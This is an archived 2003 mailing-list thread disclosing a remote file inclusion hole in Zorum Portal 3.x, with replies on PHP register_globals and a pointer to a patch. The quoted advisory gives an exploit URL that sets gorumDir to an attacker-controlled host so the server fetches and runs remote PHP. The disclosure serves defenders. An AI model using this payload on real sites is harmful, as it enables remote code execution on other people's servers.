Re: Zorum Portal (PHP)

2003-01-30 Thread MightyE 
Messer wrote:


Hello MGHz,

 

In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:

$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST


// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""

Messer.

Actually that's just the default.  As per 
http://www.php.net/manual/tw/configuration.directives.php#ini.register-globals 
it is still possible to configure PHP to register global variables such 
as $HTTP_POST_VARS['var'] as root level global variables, where your 
above example would render $Var_2 == "value2".  This is a directive set 
in the php.ini file, and frequently required for reverse compatibility. 
Setting register_globals to false in php.ini will circumvent many such 
attacks, though it may break some scripts.  The fact that it now 
defaults to false will hopefully keep developers using $_POST, $_GET, 
$HTTP_POST_VARS, and $HTTP_GET_VARS, which is far more secure.

-MightyE

Re[2]: Zorum Portal (PHP)

2003-01-29 Thread Messer 
Hello MGHz,

>>From: MGhz <[EMAIL PROTECTED]>
>>To: [EMAIL PROTECTED]
>>Subject: Zorum Portal  (PHP)
>>Date: 22 Jan 2003 19:45:26 -
>>
>>
>>
>>Version : 3.0;3.1;3.2
>>Website : http://zorum.phpoutsourcing.com/
>>Problem : Include file
>>
>>
>>File:
>>-
>>include.php
>>-
>>
>>PHP Code:
>>-
>>[...]
>>include("$gorumDir/generformlib_multipleselection.php");
>>include("$gorumDir/generformlib_groupselection.php");
>>include("$gorumDir/generformlib_filebutton.php");
>>include("$gorumDir/group.php");
>>[...]
>>-
>>
>>Exploit :
>>-
>>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>>-->
>>include http://[attacker]/group.php on remote server
>>-
>>
>>--
>>[EMAIL PROTECTED]

In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:

$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST


// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""

Messer.

Re: Zorum Portal (PHP)

2003-01-27 Thread Frog Man 
A patch has been created for this hole and can be found on 
http://www.phpsecure.org/.






From: MGhz <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Zorum Portal  (PHP)
Date: 22 Jan 2003 19:45:26 -



Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
-
include.php
-

PHP Code:
-
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
-

Exploit :
-
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
-

--
[EMAIL PROTECTED]



_

Zorum Portal (PHP)

2003-01-22 Thread MGhz 


Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
-
include.php
-

PHP Code:
-
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
-

Exploit :
-
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
-

--
[EMAIL PROTECTED]